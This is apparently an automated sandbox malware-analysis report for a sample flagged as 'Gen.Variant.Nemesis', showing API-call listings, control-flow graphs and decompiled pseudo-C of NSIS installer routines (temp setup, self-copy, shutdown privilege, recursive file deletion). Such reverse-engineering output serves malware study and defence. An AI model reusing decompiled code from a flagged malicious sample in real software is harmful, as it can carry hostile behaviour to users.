                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                    • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" ,00000000,?), ref: 0040397C
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,0042AA28,00000001), ref: 00403A0E
                                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                  • OleUninitialize.OLE32(?), ref: 00403A5E
                                                  • ExitProcess.KERNEL32 ref: 00403A78
                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                  • ExitProcess.KERNEL32 ref: 00403B0C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                  • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3859024572-1460035448
                                                  • Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                                  • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                  • Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                                  • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 165 4057e4-4057e7 145->165 166 4057c8-4057e2 SendMessageW * 2 145->166 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 169 405917-40591b 154->169 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 167 405952-405965 SendMessageW 158->167 160->154 163 405930-405939 call 40559f 161->163 164 40593e-40593f call 404472 161->164 163->164 164->156 172 4057f7-40580e call 404499 165->172 173 4057e9-4057f5 SendMessageW 165->173 166->165 174 405a67-405a69 167->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 167->175 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->169 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 185 4059c6-4059dd 181->185 186 405833 182->186 187 405826-405831 ShowWindow 182->187 183->174 184 40586b-405883 SendMessageW * 2 183->184 184->174 188 4059e2-4059fd SendMessageW 185->188 189 405839-40583f call 4044ce 186->189 187->189 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                  C-Code - Quality: 96%
                                                  			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                  				struct HWND__* _v8;
                                                  				long _v12;
                                                  				struct tagRECT _v28;
                                                  				void* _v36;
                                                  				signed int _v40;
                                                  				int _v44;
                                                  				int _v48;
                                                  				signed int _v52;
                                                  				int _v56;
                                                  				void* _v60;
                                                  				void* _v68;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				struct HWND__* _t94;
                                                  				long _t95;
                                                  				int _t100;
                                                  				int _t101;
                                                  				long _t104;
                                                  				void* _t108;
                                                  				intOrPtr _t119;
                                                  				void* _t127;
                                                  				intOrPtr _t130;
                                                  				struct HWND__* _t134;
                                                  				int _t156;
                                                  				int _t159;
                                                  				struct HMENU__* _t164;
                                                  				struct HWND__* _t168;
                                                  				struct HWND__* _t169;
                                                  				int _t171;
                                                  				void* _t172;
                                                  				short* _t173;
                                                  				short* _t175;
                                                  				int _t177;
                                                  
                                                  				_t169 =  *0x433ee4; // 0x14004c
                                                  				_t156 = 0;
                                                  				_v8 = _t169;
                                                  				if(_a8 != 0x110) {
                                                  					__eflags = _a8 - 0x405;
                                                  					if(_a8 == 0x405) {
                                                  						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                  						CloseHandle(_t127); // executed
                                                  					}
                                                  					__eflags = _a8 - 0x111;
                                                  					if(_a8 != 0x111) {
                                                  						L17:
                                                  						_t171 = 1;
                                                  						__eflags = _a8 - 0x404;
                                                  						if(_a8 != 0x404) {
                                                  							L25:
                                                  							__eflags = _a8 - 0x7b;
                                                  							if(_a8 != 0x7b) {
                                                  								goto L20;
                                                  							}
                                                  							_t94 = _v8;
                                                  							__eflags = _a12 - _t94;
                                                  							if(_a12 != _t94) {
                                                  								goto L20;
                                                  							}
                                                  							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                  							__eflags = _t95 - _t156;
                                                  							_a8 = _t95;
                                                  							if(_t95 <= _t156) {
                                                  								L36:
                                                  								return 0;
                                                  							}
                                                  							_t164 = CreatePopupMenu();
                                                  							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                  							_t100 = _a16;
                                                  							__eflags = _a16 - 0xffffffff;
                                                  							_t159 = _a16 >> 0x10;
                                                  							if(_a16 == 0xffffffff) {
                                                  								GetWindowRect(_v8,  &_v28);
                                                  								_t100 = _v28.left;
                                                  								_t159 = _v28.top;
                                                  							}
                                                  							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                                  							__eflags = _t101 - _t171;
                                                  							if(_t101 == _t171) {
                                                  								_v60 = _t156;
                                                  								_v48 = 0x42d268;
                                                  								_v44 = 0x1000;
                                                  								_a4 = _a8;
                                                  								do {
                                                  									_a4 = _a4 - 1;
                                                  									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                                  									__eflags = _a4 - _t156;
                                                  									_t171 = _t171 + _t104 + 2;
                                                  								} while (_a4 != _t156);
                                                  								OpenClipboard(_t156);
                                                  								EmptyClipboard();
                                                  								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                  								_a4 = _t108;
                                                  								_t172 = GlobalLock(_t108);
                                                  								do {
                                                  									_v48 = _t172;
                                                  									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                  									 *_t173 = 0xd;
                                                  									_t175 = _t173 + 2;
                                                  									 *_t175 = 0xa;
                                                  									_t172 = _t175 + 2;
                                                  									_t156 = _t156 + 1;
                                                  									__eflags = _t156 - _a8;
                                                  								} while (_t156 < _a8);
                                                  								GlobalUnlock(_a4);
                                                  								SetClipboardData(0xd, _a4);
                                                  								CloseClipboard();
                                                  							}
                                                  							goto L36;
                                                  						}
                                                  						__eflags =  *0x433ecc - _t156; // 0x0
                                                  						if(__eflags == 0) {
                                                  							ShowWindow( *0x434f08, 8);
                                                  							__eflags =  *0x434f8c - _t156;
                                                  							if( *0x434f8c == _t156) {
                                                  								_t119 =  *0x42c240; // 0x86dd5c
                                                  								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                  							}
                                                  							E00404472(_t171);
                                                  							goto L25;
                                                  						}
                                                  						 *0x42ba38 = 2;
                                                  						E00404472(0x78);
                                                  						goto L20;
                                                  					} else {
                                                  						__eflags = _a12 - 0x403;
                                                  						if(_a12 != 0x403) {
                                                  							L20:
                                                  							return E00404500(_a8, _a12, _a16);
                                                  						}
                                                  						ShowWindow( *0x433ed0, _t156);
                                                  						ShowWindow(_t169, 8);
                                                  						E004044CE(_t169);
                                                  						goto L17;
                                                  					}
                                                  				}
                                                  				_v52 = _v52 | 0xffffffff;
                                                  				_v40 = _v40 | 0xffffffff;
                                                  				_t177 = 2;
                                                  				_v60 = _t177;
                                                  				_v56 = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t130 =  *0x434f10;
                                                  				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                  				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                  				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                  				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                  				_t134 = GetDlgItem(_a4, 0x3f8);
                                                  				 *0x433ee4 = _t134;
                                                  				_v8 = _t134;
                                                  				E004044CE( *0x433ed0);
                                                  				 *0x433ed4 = E00404E27(4);
                                                  				 *0x433eec = 0;
                                                  				GetClientRect(_v8,  &_v28);
                                                  				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                  				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                  				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                  				if(_a8 >= 0) {
                                                  					SendMessageW(_v8, 0x1001, 0, _a8);
                                                  					SendMessageW(_v8, 0x1026, 0, _a8);
                                                  				}
                                                  				if(_a12 >= _t156) {
                                                  					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                  				}
                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  				_push(0x1b);
                                                  				E00404499(_a4);
                                                  				if(( *0x434f18 & 0x00000003) != 0) {
                                                  					ShowWindow( *0x433ed0, _t156);
                                                  					if(( *0x434f18 & 0x00000002) != 0) {
                                                  						 *0x433ed0 = _t156;
                                                  					} else {
                                                  						ShowWindow(_v8, 8);
                                                  					}
                                                  					E004044CE( *0x433ec8);
                                                  				}
                                                  				_t168 = GetDlgItem(_a4, 0x3ec);
                                                  				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                  				if(( *0x434f18 & 0x00000004) != 0) {
                                                  					SendMessageW(_t168, 0x409, _t156, _a12);
                                                  					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                  				}
                                                  				goto L36;
                                                  			}





































                                                  0x004056e6
                                                  0x004056ec
                                                  0x004056f6
                                                  0x004056f9
                                                  0x00405888
                                                  0x0040588f
                                                  0x004058ac
                                                  0x004058b3
                                                  0x004058b3
                                                  0x004058b9
                                                  0x004058c6
                                                  0x004058e4
                                                  0x004058e6
                                                  0x004058e7
                                                  0x004058ee
                                                  0x00405944
                                                  0x00405944
                                                  0x00405948
                                                  0x00000000
                                                  0x00000000
                                                  0x0040594a
                                                  0x0040594d
                                                  0x00405950
                                                  0x00000000
                                                  0x00000000
                                                  0x0040595a
                                                  0x00405960
                                                  0x00405962
                                                  0x00405965
                                                  0x00405a67
                                                  0x00000000
                                                  0x00405a67
                                                  0x00405974
                                                  0x0040597f
                                                  0x00405988
                                                  0x0040598f
                                                  0x00405993
                                                  0x00405996
                                                  0x0040599f
                                                  0x004059a5
                                                  0x004059a8
                                                  0x004059a8
                                                  0x004059b8
                                                  0x004059be
                                                  0x004059c0
                                                  0x004059c9
                                                  0x004059cc
                                                  0x004059d3
                                                  0x004059da
                                                  0x004059e2
                                                  0x004059e2
                                                  0x004059f0
                                                  0x004059f6
                                                  0x004059f9
                                                  0x004059f9
                                                  0x00405a00
                                                  0x00405a06
                                                  0x00405a12
                                                  0x00405a19
                                                  0x00405a22
                                                  0x00405a24
                                                  0x00405a27
                                                  0x00405a36
                                                  0x00405a39
                                                  0x00405a3f
                                                  0x00405a40
                                                  0x00405a46
                                                  0x00405a47
                                                  0x00405a48
                                                  0x00405a48
                                                  0x00405a50
                                                  0x00405a5b
                                                  0x00405a61
                                                  0x00405a61
                                                  0x00000000
                                                  0x004059c0
                                                  0x004058f0
                                                  0x004058f6
                                                  0x00405926
                                                  0x00405928
                                                  0x0040592e
                                                  0x00405930
                                                  0x00405939
                                                  0x00405939
                                                  0x0040593f
                                                  0x00000000
                                                  0x0040593f
                                                  0x004058fa
                                                  0x00405904
                                                  0x00000000
                                                  0x004058c8
                                                  0x004058c8
                                                  0x004058ce
                                                  0x00405909
                                                  0x00000000
                                                  0x00405912
                                                  0x004058d7
                                                  0x004058dc
                                                  0x004058df
                                                  0x00000000
                                                  0x004058df
                                                  0x004058c6
                                                  0x004056ff
                                                  0x00405703
                                                  0x0040570b
                                                  0x0040570f
                                                  0x00405712
                                                  0x00405715
                                                  0x00405718
                                                  0x0040571b
                                                  0x0040571c
                                                  0x0040571d
                                                  0x00405736
                                                  0x00405739
                                                  0x00405743
                                                  0x00405752
                                                  0x0040575a
                                                  0x00405762
                                                  0x00405767
                                                  0x0040576a
                                                  0x00405776
                                                  0x0040577f
                                                  0x00405788
                                                  0x004057aa
                                                  0x004057b0
                                                  0x004057c1
                                                  0x004057c6
                                                  0x004057d4
                                                  0x004057e2
                                                  0x004057e2
                                                  0x004057e7
                                                  0x004057f5
                                                  0x004057f5
                                                  0x004057fa
                                                  0x004057fd
                                                  0x00405802
                                                  0x0040580e
                                                  0x00405817
                                                  0x00405824
                                                  0x00405833
                                                  0x00405826
                                                  0x0040582b
                                                  0x0040582b
                                                  0x0040583f
                                                  0x0040583f
                                                  0x00405853
                                                  0x0040585c
                                                  0x00405865
                                                  0x00405875
                                                  0x00405881
                                                  0x00405881
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                  • GetClientRect.USER32(?,?), ref: 00405788
                                                  • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                  • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                  • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                  • ShowWindow.USER32(00000000), ref: 004058D7
                                                  • ShowWindow.USER32(0014004C,00000008), ref: 004058DC
                                                  • ShowWindow.USER32(00000008), ref: 00405926
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                  • CreatePopupMenu.USER32 ref: 0040596B
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                  • GetWindowRect.USER32(?,?), ref: 0040599F
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                  • OpenClipboard.USER32(00000000), ref: 00405A00
                                                  • EmptyClipboard.USER32 ref: 00405A06
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                  • CloseClipboard.USER32 ref: 00405A61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                  • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                  • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                  • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 455 405cc1-405cc2 call 405e58 449->455 456 405cb4-405cbf lstrcatW 449->456 450->447 454 405dba-405dbd 450->454 451->449 451->450 457 405dc7-405dcf call 406873 454->457 458 405dbf-405dc5 454->458 459 405cc7-405ccb 455->459 456->459 457->447 466 405dd1-405de5 call 405e0c call 405c01 457->466 458->447 462 405cd7-405cdd lstrcatW 459->462 463 405ccd-405cd5 459->463 465 405ce2-405cfe lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 472 405d2c-405d40 call 40653d 467->472 473 405d0e-405d16 467->473 468->450 471 405dae 468->471 471->450 484 405d42-405d4a 472->484 485 405d57-405d62 call 405c01 472->485 476 405d18-405d20 473->476 477 405d8b-405d9b FindNextFileW 473->477 476->472 478 405d22-405d2a 476->478 477->467 481 405da1-405da2 FindClose 477->481 478->472 478->477 481->468 482->458 486 405dec-405dfb call 40559f call 4062fd 482->486 483->447 484->477 487 405d4c-405d55 call 405c49 484->487 495 405d83-405d86 call 40559f 485->495 496 405d64-405d67 485->496 486->447 487->477 495->477 499 405d69-405d79 call 40559f call 4062fd 496->499 500 405d7b-405d81 496->500 499->477 500->477
                                                  C-Code - Quality: 98%
                                                  			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				short _v556;
                                                  				short _v558;
                                                  				struct _WIN32_FIND_DATAW _v604;
                                                  				signed int _t38;
                                                  				signed int _t52;
                                                  				signed int _t55;
                                                  				signed int _t62;
                                                  				void* _t64;
                                                  				signed char _t65;
                                                  				WCHAR* _t66;
                                                  				void* _t67;
                                                  				WCHAR* _t68;
                                                  				void* _t70;
                                                  
                                                  				_t65 = _a8;
                                                  				_t68 = _a4;
                                                  				_v8 = _t65 & 0x00000004;
                                                  				_t38 = E00405F14(__eflags, _t68);
                                                  				_v12 = _t38;
                                                  				if((_t65 & 0x00000008) != 0) {
                                                  					_t62 = DeleteFileW(_t68); // executed
                                                  					asm("sbb eax, eax");
                                                  					_t64 =  ~_t62 + 1;
                                                  					 *0x434f88 =  *0x434f88 + _t64;
                                                  					return _t64;
                                                  				}
                                                  				_a4 = _t65;
                                                  				_t8 =  &_a4;
                                                  				 *_t8 = _a4 & 0x00000001;
                                                  				__eflags =  *_t8;
                                                  				if( *_t8 == 0) {
                                                  					L5:
                                                  					E0040653D(0x42f270, _t68);
                                                  					__eflags = _a4;
                                                  					if(_a4 == 0) {
                                                  						E00405E58(_t68);
                                                  					} else {
                                                  						lstrcatW(0x42f270, L"\\*.*");
                                                  					}
                                                  					__eflags =  *_t68;
                                                  					if( *_t68 != 0) {
                                                  						L10:
                                                  						lstrcatW(_t68, 0x40a014);
                                                  						L11:
                                                  						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                  						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                  						_t70 = _t38;
                                                  						__eflags = _t70 - 0xffffffff;
                                                  						if(_t70 == 0xffffffff) {
                                                  							L26:
                                                  							__eflags = _a4;
                                                  							if(_a4 != 0) {
                                                  								_t30 = _t66 - 2;
                                                  								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                  								__eflags =  *_t30;
                                                  							}
                                                  							goto L28;
                                                  						} else {
                                                  							goto L12;
                                                  						}
                                                  						do {
                                                  							L12:
                                                  							__eflags = _v604.cFileName - 0x2e;
                                                  							if(_v604.cFileName != 0x2e) {
                                                  								L16:
                                                  								E0040653D(_t66,  &(_v604.cFileName));
                                                  								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                  								if(__eflags == 0) {
                                                  									_t52 = E00405C01(__eflags, _t68, _v8);
                                                  									__eflags = _t52;
                                                  									if(_t52 != 0) {
                                                  										E0040559F(0xfffffff2, _t68);
                                                  									} else {
                                                  										__eflags = _v8 - _t52;
                                                  										if(_v8 == _t52) {
                                                  											 *0x434f88 =  *0x434f88 + 1;
                                                  										} else {
                                                  											E0040559F(0xfffffff1, _t68);
                                                  											E004062FD(_t67, _t68, 0);
                                                  										}
                                                  									}
                                                  								} else {
                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                  									if(__eflags == 0) {
                                                  										E00405C49(__eflags, _t68, _a8);
                                                  									}
                                                  								}
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _v558;
                                                  							if(_v558 == 0) {
                                                  								goto L24;
                                                  							}
                                                  							__eflags = _v558 - 0x2e;
                                                  							if(_v558 != 0x2e) {
                                                  								goto L16;
                                                  							}
                                                  							__eflags = _v556;
                                                  							if(_v556 == 0) {
                                                  								goto L24;
                                                  							}
                                                  							goto L16;
                                                  							L24:
                                                  							_t55 = FindNextFileW(_t70,  &_v604);
                                                  							__eflags = _t55;
                                                  						} while (_t55 != 0);
                                                  						_t38 = FindClose(_t70);
                                                  						goto L26;
                                                  					}
                                                  					__eflags =  *0x42f270 - 0x5c;
                                                  					if( *0x42f270 != 0x5c) {
                                                  						goto L11;
                                                  					}
                                                  					goto L10;
                                                  				} else {
                                                  					__eflags = _t38;
                                                  					if(_t38 == 0) {
                                                  						L28:
                                                  						__eflags = _a4;
                                                  						if(_a4 == 0) {
                                                  							L36:
                                                  							return _t38;
                                                  						}
                                                  						__eflags = _v12;
                                                  						if(_v12 != 0) {
                                                  							_t38 = E00406873(_t68);
                                                  							__eflags = _t38;
                                                  							if(_t38 == 0) {
                                                  								goto L36;
                                                  							}
                                                  							E00405E0C(_t68);
                                                  							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                  							__eflags = _t38;
                                                  							if(_t38 != 0) {
                                                  								return E0040559F(0xffffffe5, _t68);
                                                  							}
                                                  							__eflags = _v8;
                                                  							if(_v8 == 0) {
                                                  								goto L30;
                                                  							}
                                                  							E0040559F(0xfffffff1, _t68);
                                                  							return E004062FD(_t67, _t68, 0);
                                                  						}
                                                  						L30:
                                                  						 *0x434f88 =  *0x434f88 + 1;
                                                  						return _t38;
                                                  					}
                                                  					__eflags = _t65 & 0x00000002;
                                                  					if((_t65 & 0x00000002) == 0) {
                                                  						goto L28;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  			}


















                                                  0x00405c53
                                                  0x00405c58
                                                  0x00405c61
                                                  0x00405c64
                                                  0x00405c6c
                                                  0x00405c6f
                                                  0x00405c72
                                                  0x00405c7a
                                                  0x00405c7c
                                                  0x00405c7d
                                                  0x00000000
                                                  0x00405c7d
                                                  0x00405c88
                                                  0x00405c8b
                                                  0x00405c8b
                                                  0x00405c8b
                                                  0x00405c8f
                                                  0x00405ca2
                                                  0x00405ca9
                                                  0x00405cae
                                                  0x00405cb2
                                                  0x00405cc2
                                                  0x00405cb4
                                                  0x00405cba
                                                  0x00405cba
                                                  0x00405cc7
                                                  0x00405ccb
                                                  0x00405cd7
                                                  0x00405cdd
                                                  0x00405ce2
                                                  0x00405ce8
                                                  0x00405cf3
                                                  0x00405cf9
                                                  0x00405cfb
                                                  0x00405cfe
                                                  0x00405da8
                                                  0x00405da8
                                                  0x00405dac
                                                  0x00405dae
                                                  0x00405dae
                                                  0x00405dae
                                                  0x00405dae
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d04
                                                  0x00405d04
                                                  0x00405d04
                                                  0x00405d0c
